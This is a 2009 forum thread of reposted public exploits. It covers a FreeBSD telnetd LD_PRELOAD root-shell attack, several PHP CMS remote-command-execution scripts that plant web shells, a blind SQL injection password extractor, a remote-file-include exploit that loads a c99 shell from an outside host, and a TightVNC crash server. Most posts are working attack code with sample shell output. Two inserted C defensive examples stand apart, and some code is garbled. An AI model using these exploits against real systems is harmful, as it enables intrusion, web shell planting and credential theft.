Exploits
aka_kludge, Date: Monday, 16.02.2009, 09:23 | Post # 1
Target: FreeBSD 7.0, 7.1
Impact: Privilege escalation

Vulnerability description:

* Privilege escalation in telnetd on FreeBSD

Exploit code:

---snip-----
# FreeBSD telnetd local/remote privilege escalation/code execution
# remote root only when accessible ftp or similar available
# tested on FreeBSD 7.0-RELEASE
# by Kingcope/2009

#include
#include
#include
#include

void _init() {
FILE *f;
setenv("LD_PRELOAD", "", 1);
system("echo ALEX-ALEX;/bin/sh");
}
---snip-----

Then we compile this stuff.

---snip-----
#gcc -o program.o -c program.c -fPIC
#gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o
-nostartfiles
---snip-----

Then we copy the file to a known location (local root exploit)

---snip-----
#cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
---snip-----

...or we upload the library through any other available attack vector.
After that we telnet to the remote or local FreeBSD telnet daemon
with setting the LD_PRELOAD environment variable to the known location
as a telnet option before.

---snip-----
#telnet
>auth disable SRA
>environ define LD_PRELOAD /tmp/libno_ex.so.1.0
>open target
---snip-----
ALEX-ALEX
#ROOTSHELL
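
The post above depends on telnetd passing a client-supplied LD_PRELOAD through to a program it starts as root. The defensive counterpart, as an added example that is not part of the original post and not FreeBSD's own code: an allowlist filter applied to client-requested variables before anything is executed. The allowlist contents and all function names are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Assumed allowlist: the only variable names a remote client may set.
 * Everything else (LD_PRELOAD, LD_LIBRARY_PATH, IFS, PATH, ...) is dropped. */
static const char *const allowed_names[] = {
    "TERM", "DISPLAY", "LANG", "USER", NULL
};

/* Return 1 if entry is NAME=value and NAME is exactly on the allowlist. */
int env_entry_allowed(const char *entry)
{
    const char *eq = strchr(entry, '=');
    size_t i, name_len;

    if (eq == NULL || eq == entry)
        return 0;                      /* no '=' at all, or an empty name */
    name_len = (size_t)(eq - entry);
    for (i = 0; allowed_names[i] != NULL; i++) {
        /* Compare whole names, so TERMINFO does not match TERM. */
        if (strlen(allowed_names[i]) == name_len &&
            strncmp(entry, allowed_names[i], name_len) == 0)
            return 1;
    }
    return 0;
}

/* Compact a NULL-terminated environment in place, keeping only allowed
 * entries. Returns the number of entries removed. */
size_t scrub_client_env(const char **env)
{
    const char **src, **dst;
    size_t removed = 0;

    for (src = dst = env; *src != NULL; src++) {
        if (env_entry_allowed(*src))
            *dst++ = *src;
        else
            removed++;
    }
    *dst = NULL;
    return removed;
}

/* Return 1 if NAME is set in env. */
int env_has(const char **env, const char *name)
{
    size_t n = strlen(name);

    for (; *env != NULL; env++)
        if (strncmp(*env, name, n) == 0 && (*env)[n] == '=')
            return 1;
    return 0;
}

/* Run the filter over a constructed client request. Returns the number of
 * entries removed, or -1 if LD_PRELOAD survived or TERM was lost. */
int sample_result(void)
{
    const char *env[] = {
        "TERM=xterm",
        "LD_PRELOAD=/tmp/libno_ex.so.1.0",  /* value used in the post */
        "LD_LIBRARY_PATH=/tmp",
        "DISPLAY=:0",
        "TERMINFO=/tmp/x",                  /* shares a prefix with TERM */
        "=empty-name",
        NULL
    };
    size_t removed = scrub_client_env(env);

    if (env_has(env, "LD_PRELOAD") || !env_has(env, "TERM"))
        return -1;
    return (int)removed;
}

int main(void)
{
    printf("entries removed from the sample request: %d\n", sample_result());
    return 0;
}
```

An allowlist fails closed: a loader variable the author never thought of is dropped along with LD_PRELOAD, which a denylist of known-bad names cannot guarantee.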

 
aka_kludge, Date: Monday, 16.02.2009, 09:24 | Post # 2
q-news 2.0 Remote Command Execution Exploit

Target: q-news 2.0
Impact: Arbitrary command execution

Exploit code:

##########################################################################

Author = FireShot , Jacopo Vuga.
Mail = fireshotautisticiorg

Vulnerability = Remote Command Execution
Software = q-news 2.0
Download =
http://ovh.dl.sourceforge.net/sourceforge/php-box/2.0_nologin.zip

Greets to = Osirys for his friendship and his tips, Myral, str0ke

###########################################################################

Code


<?php
$filename = 'settings.php';
if (is_writable($filename)) {
     if (!$handle = fopen($filename, 'w')) {
          print "Cannot open file ($filename)";
          exit;
     }
if (!fwrite($handle, "<?php
   \$password = '$password';
   \$font = '$font';
   \$height = '$height';
   \$width = '$width';
   \$direction = '$direction';
   \$speed = '$speed';
   \$bgcolor = '$bgcolor';
   \$txtcolor = '$txtcolor';
   \$txtsize = '$txtsize';
   ?>")) {
         print "Cannot write to file ($filename)";
         exit;
     }
     print "Successfully saved settings to file ($filename)";
     fclose($handle);
                      
} else {
     print "The file $filename is not writable";
}
?>

[EXPLOIT]

#!/usr/bin/perl

use HTTP::Request;
use LWP::UserAgent;

my $host = $ARGV[0];
my $vuln = "/wsettings.php?speed=";
my $rce = "/settings.php?cmd=";
my $evil = "';system(\$_GET[cmd]);\$x = '";

my $inj_url = $host.$vuln.$evil;
my $rce_url = $host.$rce;

($host) || die " usage= perl $0 site \n";

print "------------------------\n";
print " Q-News RCE Exploit \n";
print " by FireShot \n";
print "------------------------\n\n";

$response = get($inj_url);
if ($response =~ /Successfully saved settings/) {
&shell;
}
else {
print "error \n";
exit(0);
}

sub shell {
print "FireShot-shell: ";
my $cmd = ;
$cmd !~ /quit/ || die " exit \n";
my $url = $rce_url.$cmd;
my $re = get($url);
if ($re =~ /(.)/) {
print $re;
}
else {
print "command unknow \n";
}
&shell;
}

sub get() {
my $url = $_[0];
my $req = HTTP::Request->new(GET => $url);
my $agent = LWP::UserAgent->new();
$agent->timeout(4);
my $response = $agent->request($req);
return $response->content;
}

[/EXPLOIT]

############################################################################


 
aka_kludge, Date: Monday, 16.02.2009, 09:25 | Post # 3
Hedgehog-CMS 1.21 (LFI) Remote Command Execution Exploit
Target: Hedgehog-CMS 1.21
Impact: Arbitrary command execution

Exploit code:

#!/usr/bin/perl

# |----------------------------------------------------------------------------------------------------------------------------------|
# | INFORMATIONS |
# |----------------------------------------------------------------------------------------------------------------------------------|
# |Web Application : Hedgedog-CMS 1.21 |
# |Download : http://mesh.dl.sourceforge.net/sourcef.....21.zip |
# |----------------------------------------------------------------------------------------------------------------------------------|
# |Remote Command Execution Exploit |
# |by Osirys |
# |osirys[at]autistici[dot]org |
# |osirys.org |
# |Thx&Greets to: evilsocket, athum |
# |----------------------------------------------------------------------------------------------------------------------------------|
# |BUG [Local File Inclusion]
# | p0c : /[path]/includes/footer.php?c_temp_path=[lf]%00
# | In source $c_temp_path is not declared, so if register_globals = On we can set its value from GET directly.
# |----------------------------------------------------------------------------------------------------------------------------------|
# |BUG [Abitrary php code writing]
# | This cms is not coded too good, we can bypass admin login just doing it via socket or lwp with $_POST[l_mode].
# | From admin panel everything before beeing passed in a file is filtered with htmlspecialchars and other fucntions,
# | expect of the email contact variable, that's the hell bug.
# | The sploit before overwriting a previous configuration, tries to get the old one, then it executes your commands.
# |----------------------------------------------------------------------------------------------------------------------------------|

# ------------------------------------------------------------------
# Exploit in action [>!]
# ------------------------------------------------------------------
# osirys[~]>$ perl lolzo.txt http://localhost/hedgehog-cms/
#
# --------------------------------
# Hedgedog-CMS RCE Exploit
# by Osirys
# --------------------------------
#
#

  • Getting old configuration data ..
    #
  • Overwriting configuration data ..
    #
  • Overwrite succesfully !
    # [&] Hi my master, do your job now [!]
    #
    # shell[localhost]$> id
    # uid=80(apache) gid=80(apache) groups=80(apache)
    # shell[localhost]$> pwd
    # /home/osirys/web/hedgehog-cms/config
    # shell[localhost]$> la
    # bash: la: command not found
    # shell[localhost]$> exit
    # [-] Quitting ..
    # osirys[~]>$
    # ------------------------------------------------------------------

    use LWP::UserAgent;
    use IO::Socket;
    use HTTP::Request::Common;

    my $post_pag = "/specialacts.php";
    my $rce_path = "/config/userconfig.php";
    my $rce_c0de = "%22%3Bsystem%28%24_GET%5Bcmd%5D%29%3B+%24xy+%3D+%22";
    my $host = $ARGV[0];

    ($host) || help("-1");
    cheek($host) == 1 || help("-2");
    &banner;

    $datas = get_input($host);
    $datas =~ /(.*) (.*)/;
    ($h0st,$path) = ($1,$2);

    my $ua_url = $host.$post_pag;
    my $ua = LWP::UserAgent->new;
    my $re = $ua->request(POST $ua_url,
    Content_Type => 'multipart/form-data',
    Content => [l_mode => '33']
    );

    if ($re->is_success) {
    $data = $re->content;
    print "

  • Getting old configuration data ..\n";
    get_old_data($data);
    &overwrite;
    }
    else {
    print "[-] Unable to get old configuration data ..\n";
    print "
  • Overwriting existing configuration ! \n";
    &overwrite;
    }

    sub overwrite {
    if ($old_data_gotcha != 1) {
    $title = "Website";
    $username = "Username";
    $contact = "admin\@admin.com";
    $copyright = "2007 website";
    }

    my $url = $path.$post_pag;

    my $code= "e_maintitle=". $title."&e_autor=".$username."&e_contact=". $contact. $rce_c0de.
    "&e_copyright=".$copyright."&e_theme=.%2Ftemp%2Fstrawberry%2F&e_language=engli".
    "sh.lng&e_favicon=&e_sp=true&e_version=true&e_guestbook=true&l_mode=35";

    my $length = length($code);

    my $data = "POST ".$url." HTTP/1.1\r\n".
    "Host: ".$h0st."\r\n".
    "Keep-Alive: 300\r\n".
    "Connection: keep-alive\r\n".
    "Content-Type: application/x-www-form-urlencoded\r\n".
    "Content-Length: ".$length."\r\n\r\n".
    $code."\r\n";

    my $socket = new IO::Socket::INET(
    PeerAddr => $h0st,
    PeerPort => '80',
    Proto => 'tcp',
    ) or die "[-] Can't connect to $h0st:80\n[?] $! \n\n";

    print "

  • Overwriting configuration data ..\n";
    $socket->send($data);

    while ((my $e = <$socket>)&&($own != 1)) {
    if ($e =~ /The configurations have been saved successfully/) {
    print "

  • Overwrite succesfully !\n";
    $own = 1;
    }
    }

    $own == 1 || die "[-] Can't overwrite configuration data !\n";

    print "[&] Hi my master, do your job now [!]\n\n";
    &exec_cmd;
    }

    sub exec_cmd {
    my(@outs,$out);
    $h0st !~ /www\./ || $h0st =~ s/www\.//;
    print "shell[$h0st]\$> ";
    $cmd = ;
    $cmd !~ /exit/ || die "[-] Quitting ..\n";
    $exec_url = $host.$rce_path."?cmd=".$cmd;
    $re = get_req($exec_url);
    if ($re =~ /./) {
    print $re;
    &exec_cmd;
    }
    else {
    $c++;
    $cmd =~ s/\n//;
    print "bash: ".$cmd.": command not found\n";
    $c < 3 || die "[-] Command are not executed.\n[-] Something wrong. Exploit Failed !\n\n";
    &exec_cmd;
    }
    }

    sub get_req() {
    $link = $_[0];
    my $req = HTTP::Request->new(GET => $link);
    my $ua = LWP::UserAgent->new();
    $ua->timeout(4);
    my $response = $ua->request($req);
    return $response->content;
    }

    sub cheek() {
    my $host = $_[0];
    if ($host =~ /http:\/\/(.*)/) {
    return 1;
    }
    else {
    return 0;
    }
    }

    sub get_input() {
    my $host = $_[0];
    $host =~ /http:\/\/(.*)/;
    $s_host = $1;
    $s_host =~ /([a-z.-]{1,30})\/(.*)/;
    ($h0st,$path) = ($1,$2);
    $path =~ s/(.*)/\/$1/;
    $full_det = $h0st." ".$path;
    return $full_det;
    }

    sub get_old_data() {
    my $re = $_[0];
    if ($re =~ /name="e_maintitle" value="(.*)" size/) { $title = $1; }
    if ($re =~ /name="e_autor" value="(.*)" size/) { $username = $1; }
    if ($re =~ /name="e_contact" value="(.*)" size/) { $contact = $1; }
    if ($re =~ /name="e_copyright" value="(.*)" size/) { $copyright = $1; }
    $old_data_gotcha = 1;
    }

    sub banner {
    print "\n".
    " -------------------------------- \n".
    " Hedgedog-CMS RCE Exploit \n".
    " by Osirys \n".
    " -------------------------------- \n\n";
    }

    sub help() {
    my $error = $_[0];
    if ($error == -1) {
    &banner;
    print "\n[-] Bad hostname! \n";
    }
    elsif ($error == -2) {
    &banner;
    print "\n[-] Bad hostname address !\n";
    }
    print "

  • Usage : perl $0 http://hostname/cms_path \n\n";
    exit(0);
    }

    aka_kludge, Date: Monday, 16.02.2009, 09:26 | Post # 4
    TightVNC Authentication Failure Integer Overflow PoC

    February 12, 2009

    Target: TightVNC
    Impact: Denial of service

    Exploit code:

    #!/usr/bin/env python

    #digital.desi@in.com

    # Modified Andres Lopez Luksenberg's exploit for Authentication Failure scenario in TightVNC. BID 33569 CVE-2009-0388

    import socket

    serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    serversocket.bind(('', 5900))
    serversocket.listen(1)

    while True:
    clientsocket, clientaddres = serversocket.accept()

    data = 'RFB 003.008\n'
    clientsocket.sendall(data)

    data_cli = clientsocket.recv(1024)
    print data_cli

    data = '\x02\x02\x10'
    clientsocket.sendall(data)

    data_cli = clientsocket.recv(1024)

    data = '\x00'*4
    clientsocket.sendall(data)

    data = ('\x00'*3)+'\x01'
    clientsocket.sendall(data)

    data = ('\x00'*3)+'\x02STDVVNCAUTH_'
    clientsocket.sendall(data)

    data_cli = clientsocket.recv(1024)

    data = ('\x01'*16)
    clientsocket.sendall(data)

    data_cli = clientsocket.recv(1024)

    data = '\x00\x00\x00\x01'
    clientsocket.sendall(data)

    data = '\xf0\xff\xff\xff'
    clientsocket.sendall(data)

    data = 'A'*10000
    clientsocket.sendall(data)

    clientsocket.close()
    serversocket.close()
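
The PoC above answers a failed authentication with the length field f0 ff ff ff followed by filler bytes, so the receiving side has to bound that length before using it. The following is an added example, not part of the original post and not TightVNC's code: a signed comparison that lets the value through, next to a bounded parse of the length-prefixed failure reason. The 1024-byte cap, the function names and the sample messages are assumptions.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MAX_REASON_LEN 1024u  /* assumed cap for a human-readable reason */

/* Length field taken from the PoC in the post. */
static const uint8_t hostile_len[4] = { 0xf0, 0xff, 0xff, 0xff };

/* Constructed sample messages: 4-byte big-endian length, then the text. */
static const uint8_t hostile_msg[] = {
    0xf0, 0xff, 0xff, 0xff, 'A', 'A', 'A', 'A', 'A', 'A', 'A', 'A'
};
static const uint8_t benign_msg[] = "\x00\x00\x00\x15" "Authentication failed";

/* Decode a 4-byte big-endian unsigned length. */
static uint32_t be32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

/* Flawed pattern: the length is held in a signed 32-bit integer, so a value
 * above 0x7fffffff wraps negative on common compilers and passes a
 * "len <= cap" test. Returns 1 if the check lets the length through. */
int signed_check_accepts(const uint8_t *len_field, int32_t cap)
{
    int32_t len = (int32_t)be32(len_field);
    return len <= cap;
}

/* Bounded parse of "reason-length + reason-string".
 * msg/msg_len: bytes received after the failed security result.
 * Copies the reason into out (NUL-terminated) and returns its length,
 * or returns -1 if the length is oversized, truncated or does not fit. */
int parse_failure_reason(const uint8_t *msg, size_t msg_len,
                         char *out, size_t out_cap)
{
    uint32_t len;

    if (msg_len < 4 || out_cap == 0)
        return -1;
    len = be32(msg);
    if (len > MAX_REASON_LEN)      /* unsigned compare, no wraparound */
        return -1;
    if (len > msg_len - 4)         /* fewer bytes present than announced */
        return -1;
    if (len >= out_cap)            /* keep room for the terminating NUL */
        return -1;
    memcpy(out, msg + 4, len);
    out[len] = '\0';
    return (int)len;
}

/* Parse the hostile sample; returns parse_failure_reason's result. */
int demo_hostile(void)
{
    char out[64];
    return parse_failure_reason(hostile_msg, sizeof hostile_msg,
                                out, sizeof out);
}

/* Parse the benign sample; returns the length, or -2 on a wrong copy. */
int demo_benign(void)
{
    char out[64];
    int n = parse_failure_reason(benign_msg, sizeof benign_msg - 1,
                                 out, sizeof out);
    if (n >= 0 && strcmp(out, "Authentication failed") != 0)
        return -2;
    return n;
}

int main(void)
{
    printf("signed check accepts f0ffffff: %d\n",
           signed_check_accepts(hostile_len, (int32_t)MAX_REASON_LEN));
    printf("bounded parse, hostile: %d\n", demo_hostile());
    printf("bounded parse, benign:  %d\n", demo_benign());
    return 0;
}
```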


     
    aka_kludge, Date: Monday, 16.02.2009, 09:28 | Post # 5
    FeedDemon <=2.7 OPML Outline Tag Buffer Overflow Exploit

    February 12, 2009

    Target: FeedDemon 2.7 and earlier versions
    Impact: Arbitrary code execution

    Vulnerability description:

    * Buffer overflow in FeedDemon

    Exploit code:

    #!/usr/local/bin/perl
    #-----------------------------------------------------------------------------
    # FeedDemon version 2.7.0.0 Buffer overFlow
    # Reference:
    # http://security.bkis.vn/?p=329
    # http://www.securityfocus.com/bid/33630/info
    # http://secunia.com/advisories/33718/
    # Tested in Windows XP Sp2 (English)
    # Created by cenjan (xcenjanx@yahoo.com)
    # Description: + This code generates a opml file (feeddemonexploit.opml)
    # + Import that file by the Import Feed function of Feed Demon
    # + The calc.exe will execute
    #-----------------------------------------------------------------------------
    my $head=' # Shellcode by Metasploit

    my $tail='">';
    open (f,'>feeddemonexploit.opml');
    print f "\xff\xfe";
    close(f);

    open (f,'>>:encoding(ucs-2le)','feeddemonexploit.opml');
    print f $head;
    close(f);

    open (f,'>>feeddemonexploit.opml');
    print f $overflow;
    print f $devil;
    close(f);

    open (f,'>>:encoding(ucs-2le)','feeddemonexploit.opml');
    print f $tail;
    close (f);
    print "Create exploit file successfully!";

     
    aka_kludge, Date: Monday, 16.02.2009, 09:28 | Post # 6
    PHP Director <= 0.21 Remote Command Execution Exploit

    February 12, 2009

    Target: PHP Director 0.21 and earlier versions
    Impact: Arbitrary command execution

    Exploit code:

    --+++===================================================================+++--
    --+++====== PHP Director <= 0.21 Remote Command Execution Exploit ======+++--
    --+++===================================================================+++--

    #!/usr/bin/perl

    use strict;
    use warnings;
    use IO::Socket;

    sub clear
    {
    my $out = $_ [0];
    $out =~ s/.+?xx//;
    $out =~ s/xx.+//;
    return $out;
    }

    sub usage
    {
    print "\nPHP Director <= 0.21 Remote Command Execution Exploit".
    "\n[+] Author: darkjoker".
    "\n[+] Site : http://darkjoker.net23.net ".
    "\n[+] Download: http://downloads.sourceforge.net/phpdire....irror=0 ".
    "\n[+] Usage : perl ${0} ".
    "\n[+] Ex. : perl ${0} localhost /PHPDirector /opt/lampp/htdocs/PHPDirector".
    "\n[+] Notes : must be the same directory where CMS is hosted".
    "\n\n";
    exit ();
    }

    sub send_shell
    {
    my ($host, $path, $disc_path) = @_;
    my $sock = new IO::Socket::INET (
    PeerHost => $host,
    PeerPort => 80,
    Proto => "tcp",
    ) or die "[-] Exploit failed.\n";
    my $sql_code = "searching=x' UNION SELECT 1,'xx "?>xx', 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15 INTO ".
    "OUTFILE '${disc_path}/shell.php' FROM pp_files#";
    my $post = "POST ${path}/index.php HTTP/1.1\r\n".
    "Host: ${host}\r\n".
    "Connection: Close\r\n".
    "Content-Length: ". length ($sql_code) . "\r\n".
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n".
    $sql_code;
    print $sock $post;
    close ($sock);
    }

    my ($host, $path, $disc_path) = @ARGV;
    usage unless ($disc_path);
    $disc_path = "../"x10 . $disc_path;
    send_shell ($host, $path, $disc_path);
    print "Delete this shell after use.\n'quit' command to exit\n\n";
    my $cmd;
    while (1)
    {
    print "backdoor\@${host}: \$ ";
    $cmd = ;
    chomp $cmd;
    $cmd =~ s/ /%20/g;
    exit if ($cmd =~ /quit/);
    my $sock = new IO::Socket::INET (
    PeerHost => $host,
    PeerPort => 80,
    Proto => "tcp",
    );
    my $get = "GET ${path}/shell.php?cmd=${cmd}\r\n\r\n";
    print $sock $get;
    my $x;
    $x .= $_ while (<$sock>);
    $x = clear ($x);
    print $x;
    close ($sock);
    }

     
    aka_kludge, Date: Monday, 16.02.2009, 09:30 | Post # 7
    IF-CMS <= 2.0 (frame.php id) Blind SQL Injection Exploit

    February 12, 2009

    Target: IF-CMS 2.0 and earlier versions
    Impact: SQL injection

    Exploit code:

    --+++=======================================================+++--
    --+++====== IF-CMS <= 2.0 Blind SQL Injection Exploit ======+++--
    --+++=======================================================+++--

    function query ($username, $char, $pos)
    {
    //Increase benchmark when exploit prints uncorrect passwords

    $query = "x' OR IF ((ASCII(SUBSTRING((SELECT pass FROM rns_admin WHERE ".
    "nick = '{$username}'),{$pos},1))={$char}), BENCHMARK(100000000,CHAR(0)),0) OR '1' = '2";
    $query = str_replace (" ", "%20", $query);
    $query = str_replace ("'", "%27", $query);
    return $query;
    }

    function exploit ($hostname, $path, $username, $char, $pos)
    {
    $char = ord ($char);
    $fp = fsockopen ($hostname, 80);
    $get = "GET {$path}/frame.php?id=". query ($username, $char, $pos) . " HTTP/1.1\r\n".
    "Host: {$hostname}\r\n".
    "Connection: Close\r\n\r\n";
    $a = time ();
    fputs ($fp, $get);
    while (!feof ($fp))
    fgets ($fp, 1024);

    fclose ($fp);
    $a = time () - $a;
    if ($a > 4)
    return true;
    else
    return false;

    }

    function usage ()
    {
    echo "\nIF-CMS <= 2.0 Blind SQL Injection Exploit".
    "\n[+] Author : darkjoker".
    "\n[+] Site : http://darkjoker.net23.net ".
    "\n[+] Download: http://downloads.sourceforge.net/if-cms....irror=0 ".
    "\n[+] Usage : php xpl.php ".
    "\n[+] Ex. : php xpl.php localhost /IF-CMS root".
    "\n\n";
    exit ();
    }

    if ($argc != 4)
    usage ();
    $hostname = $argv [1];
    $path = $argv [2];
    $user = $argv [3];
    //Edit this keylist when returned password is incomplete and add other characters you want
    $key = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
    $chr = 0;
    $pos = 1;
    echo "[+] Password: ";
    while ($chr < strlen ($key))
    {
    if (exploit ($hostname, $path, $user, $key [$chr], $pos))
    {
    echo $key [$chr];
    $chr = 0;
    $pos++;
    }
    else
    $chr++;
    }
    echo "\n\n";
    ?>

     
    aka_kludge, Date: Monday, 16.02.2009, 09:30 | Post # 8
    1024 CMS <= 1.4.4 Remote Command Execution with RFI (c99) Exploit

    February 12, 2009

    Target: 1024 CMS 1.4.4 and earlier versions
    Impact: Arbitrary command execution

    Vulnerability description:

    * Multiple vulnerabilities in 1024 CMS

    Exploit code:

    #!/usr/bin/perl
    ####################################################################
    # 1024 CMS <= 1.4.4 Remote Command Execution with RFI (c99) Exploit
    # download: http://www.trebledesigns.com/1024cms.zip
    #
    # Author: JosS
    # mail: sys-project[at]hotmail[dot]com
    # site: http://www.hack0wn.com/
    # team: Spanish Hackers Team - [SHT]
    #
    # Hack0wn Security Project!!
    #
    # This was written for educational purpose. Use it at your own risk.
    # Author will be not responsible for any damage.
    #
    ####################################################################
    #
    # "need" allow_url_include = On && register_globals = On
    #
    # RFI vuln!: [/themes/default/layouts/standard.php]
    # # if($page_ck['custom'] == 'N' || isset($page_include)) {
    # if(!isset($page_include)) include("./pages/".$page."/default/content.php");
    # else include($page_include);
    # } else {
    # ...
    #
    ####################################################################
    # OUTPUT: (tested on localhost)
    #
    # [shell]:~$ id
    # uid=33(www-data) gid=33(www-data) groups=33(www-data)
    # [shell]:~$ uname -a
    # Linux h4x0rz 2.6.18-6-686 #1 SMP Fri Dec 12 16:48:28 UTC 2008 i686 GNU/Linux
    # [shell]:~$ exit
    # h4x0rz:/home/joss/Desktop#

    use LWP::UserAgent;
    use HTTP::Request;
    use LWP::Simple;
    use Getopt::Long;

    sub clear{
    system(($^O eq 'MSWin32') ? 'cls' : 'clear');
    }

    &clear();

    sub banner {
    &clear();
    print "[x] 1024 CMS <= 1.4.4 Remote Command Execution with RFI (c99) Exploit\n";
    print "[x] Written By JosS\n";
    print "[x] sys-project[at]hotmail[dot]com\n\n";
    print "[+] Usage:\n";
    print "[+] $0 -vuln \"web+path\" -shell \"shell\"\n";
    print "[+] eX: $0 -vuln \"http://www.hack0wn.com/test/\" -shell \"http://hack0wn.com/c99.txt?\"\n\n";
    exit();
    }

    my $options = GetOptions (
    'help!' => \$help,
    'vuln=s' => \$vuln,
    'shell=s' => \$shell
    );

    &banner unless ($vuln);
    &banner unless ($shell);

    &banner if $banner eq 1;

    chomp($vuln);
    chomp($shell);

    while (){

    print "[shell]:~\$ ";
    chomp($cmd=);

    if ($cmd eq "exit" || $cmd eq "quit") {
    exit 0;
    }

    my $ua = LWP::UserAgent->new;
    $iny="?&act=cmd&cmd=" . $cmd . "&d=/&submit=1&cmd_txt=1";
    chomp($iny);
    my $own = $vuln . "/themes/default/layouts/standard.php?page_include=" . $shell . $iny;
    chomp($own);
    my $req = HTTP::Request->new(GET => $own);
    my $res = $ua->request($req);
    my $con = $res->content;
    if ($res->is_success){
    print $1,"\n" if ( $con =~ m/readonly> (.*?)\<\/textarea>/mosix);
    }
    else
    {
    print "[p0c] Exploit failed\n";
    exit(1);
    }
    }

    # __h0__

     
    aka_kludge, Date: Monday, 16.02.2009, 09:30 | Post # 9
    Simple PHP News 1.0 Remote Command Execution Exploit

    February 10, 2009

    Target: Simple PHP News 1.0
    Impact: Arbitrary command execution

    Exploit code:

    * Simple PHP News-expl.pl

    #!/usr/bin/perl

    # -----------------------------------------------------------------------------
    # INFORMATIONS
    # -----------------------------------------------------------------------------

    # App => Simple PHP News 1.0 Final
    # Downl => http://www.hotscripts.com/jump.php?listing_id=66376&jump_type=1

    # Remote Command Execution Exploit
    # by Osirys
    # osirys[at]autistici[dot]org
    # osirys.org
    # Thx&Greets to: evilsocket

    # A personal comment : just bleah !!

    # Tested with: Magic Quotes => Off

    # ------------------------------------------------------------------
    # Exploit in action [>!]
    # ------------------------------------------------------------------
    # osirys[~]>$ perl rce_lol.txt http://localhost/php_simple_news/

    # ---------------------------------
    # Simple PHP News RCE Exploit
    # by Osirys
    # ---------------------------------

    #

  • Adding new evil news ..
    #
  • RCE Created !
    # [&] Hi my master, do your job now [!]

    # shell[localhost]$> id
    # uid=80(apache) gid=80(apache) groups=80(apache)
    # shell[localhost]$> pwd
    # /home/osirys/web/php_simple_news
    # shell[localhost]$> exit
    # [-] Quitting ..
    # osirys[~]>$
    # ------------------------------------------------------------------

    use LWP::UserAgent;
    use IO::Socket;
    use HTTP::Request::Common;

    my $post_pag = "/post.php";
    my $rce_path = "/display.php";
    my $rand = int(rand 99) +1;
    my $host = $ARGV[0];

    ($host) || help("-1");
    cheek($host) == 1 || help("-2");
    &banner;

    $datas = get_input($host);
    $datas =~ /(.*) (.*)/;
    ($h0st,$path) = ($1,$2);

    my $date = &date;
    my $url = $path.$post_pag;

    my $code = "title=Shout&date=".$date. "&post=%3C%3Fphp%0D%0Aecho+".
    "%22shoutZ0".$rand."%22%3B%0D%0Aif%28get_magic_quotes_".
    "gpc%28%29%29%7B%0D%0A+++%24_GET%5Bcmd%5D%3Dstripslash".
    "es%28%24_GET%5Bcmd%5D%29%3B%0D%0A%7D%0D%0Asystem%28%2".
    "4_GET%5Bcmd%5D%29%3B%0D%0Aecho+%22-0Ztuohs".$rand."%2".
    "2%3B%0D%0A%3F%3E";

    my $length = length($code);

    my $data = "POST ".$url." HTTP/1.1\r\n".
    "Host: ".$h0st."\r\n".
    "Keep-Alive: 300\r\n".
    "Connection: keep-alive\r\n".
    "Content-Type: application/x-www-form-urlencoded\r\n".
    "Content-Length: ".$length."\r\n\r\n".
    $code."\r\n";

    my $socket = new IO::Socket::INET(
    PeerAddr => $h0st,
    PeerPort => '80',
    Proto => 'tcp',
    ) or die "[-] Can't connect to $h0st:80\n[?] $! \n\n";

    print "

  • Adding new evil news ..\n";
    $socket->send($data);

    while ((my $e = <$socket>)&&($own != 1)) {
    if ($e =~ /Entry added successfully/) {
    $own = 1;
    print "

  • RCE Created ! \n";
    }
    }
    $own == 1 || die "[-] Can't send new news !\n";

    print "[&] Hi my master, do your job now [!]\n\n";
    &exec_cmd;

    sub exec_cmd {
    my(@outs,$out);
    $h0st !~ /www\./ || $h0st =~ s/www\.//;
    print "shell[$h0st]\$> ";
    $cmd = ;
    $cmd !~ /exit/ || die "[-] Quitting ..\n";
    $exec_url = $host.$rce_path."?cmd=".$cmd;
    $re = get_req($exec_url);
    $content = tag($re);
    if ($content =~ /shoutZ0$rand(.*)-0Ztuohs$rand/) {
    $out = $1;
    @outs = split //, $out;
    foreach my $e(@outs) {
    $e =~ s/\*/\n/;
    print $e;
    }
    &exec_cmd;
    }
    elsif ($content =~ /shoutZ0$rand-0Ztuohs$rand/) {
    $c++;
    $cmd =~ s/\n//;
    print "bash: ".$cmd.": command not found\n";
    $c < 3 || die "[-] Command are not executed.\n[-] Something wrong. Exploit Failed !\n\n";
    &exec_cmd;
    }
    }

    sub date {
    my $year = (localtime)[5] + 1900;
    my $month = (localtime)[4];
    my $day = (localtime)[3];
    $month =~ s/([0-9]{1})/0$1/ if ($month =~ /[0-9]{1}/);
    $day =~ s/([0-9]{1})/0$1/ if ($day =~ /[0-9]{1}/);
    my $date = $month."/".$day."/".$year;
    return($date);
    }

    sub get_req() {
    $link = $_[0];
    my $req = HTTP::Request->new(GET => $link);
    my $ua = LWP::UserAgent->new();
    $ua->timeout(4);
    my $response = $ua->request($req);
    return $response->content;
    }

    sub cheek() {
    my $host = $_[0];
    if ($host =~ /http:\/\/(.*)/) {
    return 1;
    }
    else {
    return 0;
    }
    }

    sub get_input() {
    my $host = $_[0];
    $host =~ /http:\/\/(.*)/;
    $s_host = $1;
    $s_host =~ /([a-z.-]{1,30})\/(.*)/;
    ($h0st,$path) = ($1,$2);
    $path =~ s/(.*)/\/$1/;
    $full_det = $h0st." ".$path;
    return $full_det;
    }

    sub tag() {
    my $string = $_[0];
    $string =~ s/\n/\*/g;
    return($string);
    }

    sub banner {
    print "\n".
    " --------------------------------- \n".
    " Simple PHP News RCE Exploit \n".
    " by Osirys \n".
    " --------------------------------- \n\n";
    }

    sub help() {
    my $error = $_[0];
    if ($error == -1) {
    &banner;
    print "\n[-] Bad hostname! \n";
    }
    elsif ($error == -2) {
    &banner;
    print "\n[-] Bad hostname address !\n";
    }
    print "

  • Usage : perl $0 http://hostname/cms_path \n\n";
    exit(0);
    }
  •  
    aka_kludge, Date: Monday, 16.02.2009, 09:33 | Post # 10
    dBpowerAMP Audio Player 2 .PLS File Local Buffer Overflow Exploit

    February 10, 2009

